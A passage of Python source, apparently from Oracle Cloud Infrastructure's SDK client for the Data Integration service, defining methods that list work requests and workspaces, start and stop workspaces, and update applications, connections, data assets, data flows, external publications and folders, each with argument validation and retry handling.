:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (in a search operation, results are sorted by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"workspace_id",
"work_request_status",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
if 'work_request_status' in kwargs:
work_request_status_allowed_values = ["ACCEPTED", "IN_PROGRESS", "FAILED", "SUCCEEDED", "CANCELING", "CANCELED"]
if kwargs['work_request_status'] not in work_request_status_allowed_values:
raise ValueError(
"Invalid value for `work_request_status`, must be one of {0}".format(work_request_status_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"workspaceId": kwargs.get("workspace_id", missing),
"workRequestStatus": kwargs.get("work_request_status", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
def list_workspaces(self, compartment_id, **kwargs):
"""
Retrieves a list of Data Integration workspaces.
:param str compartment_id: (required)
The OCID of the compartment containing the resources you want to list.
:param str name: (optional)
Used to filter by the name of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str lifecycle_state: (optional)
The lifecycle state of a resource. When specified, the operation only returns resources that match the given lifecycle state. When not specified, resources in all lifecycle states are returned.
Allowed values are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (in a search operation, results are sorted by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkspaceSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_workspaces.py.html>`__ to see an example of how to use list_workspaces API.
"""
resource_path = "/workspaces"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_workspaces got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"name": kwargs.get("name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkspaceSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkspaceSummary]")
def start_workspace(self, workspace_id, **kwargs):
"""
Starts a workspace.
:param str workspace_id: (required)
The workspace ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/start_workspace.py.html>`__ to see an example of how to use start_workspace API.
"""
resource_path = "/workspaces/{workspaceId}/actions/start"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"start_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
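# Illustrative sketch (commented out): start a workspace while explicitly
# disabling retries with NoneRetryStrategy, so the opc-retry-token header is not
# injected (see the isinstance check in the body above). The OCID is a placeholder.
#
#   client.start_workspace(
#       workspace_id="ocid1.disworkspace.oc1..example",  # hypothetical OCID
#       retry_strategy=oci.retry.NoneRetryStrategy())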
def stop_workspace(self, workspace_id, **kwargs):
"""
Stops a workspace.
:param str workspace_id: (required)
The workspace ID.
:param int quiesce_timeout: (optional)
Used to set the timeout for Data Integration to gracefully close down any running jobs before stopping the workspace.
:param bool is_force_operation: (optional)
Used to forcibly shut down the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/stop_workspace.py.html>`__ to see an example of how to use stop_workspace API.
"""
resource_path = "/workspaces/{workspaceId}/actions/stop"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"quiesce_timeout",
"is_force_operation",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"stop_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"quiesceTimeout": kwargs.get("quiesce_timeout", missing),
"isForceOperation": kwargs.get("is_force_operation", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
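# Illustrative sketch (commented out): stop the same hypothetical workspace,
# giving Data Integration a chance to quiesce running jobs instead of forcing an
# immediate shutdown. The timeout units are assumed to be seconds.
#
#   client.stop_workspace(
#       workspace_id="ocid1.disworkspace.oc1..example",  # hypothetical OCID
#       quiesce_timeout=300,  # units assumed to be seconds
#       is_force_operation=False)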
def update_application(self, workspace_id, application_key, update_application_details, **kwargs):
"""
Updates an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.UpdateApplicationDetails update_application_details: (required)
The details needed to update an application.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_application.py.html>`__ to see an example of how to use update_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_application_details,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_application_details,
response_type="Application")
def update_connection(self, workspace_id, connection_key, update_connection_details, **kwargs):
"""
Updates a connection under a data asset.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param oci.data_integration.models.UpdateConnectionDetails update_connection_details: (required)
The information needed to update a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_connection.py.html>`__ to see an example of how to use update_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_connection_details,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_connection_details,
response_type="Connection")
def update_data_asset(self, workspace_id, data_asset_key, update_data_asset_details, **kwargs):
"""
Updates a specific data asset with a default connection.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param oci.data_integration.models.UpdateDataAssetDetails update_data_asset_details: (required)
The information needed to update a data asset.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_data_asset.py.html>`__ to see an example of how to use update_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
def update_data_flow(self, workspace_id, data_flow_key, update_data_flow_details, **kwargs):
"""
Updates a specific data flow.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param oci.data_integration.models.UpdateDataFlowDetails update_data_flow_details: (required)
The details needed to update a data flow.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_data_flow.py.html>`__ to see an example of how to use update_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_flow_details,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_flow_details,
response_type="DataFlow")
def update_external_publication(self, workspace_id, task_key, external_publications_key, update_external_publication_details, **kwargs):
"""
Updates the external publication object.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param oci.data_integration.models.UpdateExternalPublicationDetails update_external_publication_details: (required)
The information to be updated.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_external_publication.py.html>`__ to see an example of how to use update_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_external_publication_details,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_external_publication_details,
response_type="ExternalPublication")
def update_folder(self, workspace_id, folder_key, update_folder_details, **kwargs):
"""
Updates a specific folder.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param oci.data_integration.models.UpdateFolderDetails update_folder_details: (required)
The details needed to update a folder.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_folder.py.html>`__ to see an example of how to use update_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
